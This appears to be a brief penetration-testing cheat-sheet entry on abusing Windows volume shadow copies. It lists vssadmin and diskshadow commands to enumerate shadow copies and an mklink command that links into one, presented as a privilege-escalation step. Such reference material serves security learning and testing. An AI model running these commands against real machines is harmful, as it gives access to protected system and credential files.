Abusing Shadow Copies
If you have local administrator access on a machine try to list shadow copies, it's an easy way for Privilege Escalation.
List shadow copies using vssadmin (Needs Admnistrator Access)
vssadmin list shadows
List shadow copies using diskshadow
diskshadow list shadows all
Make a symlink to the shadow copy and access it
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
Last updated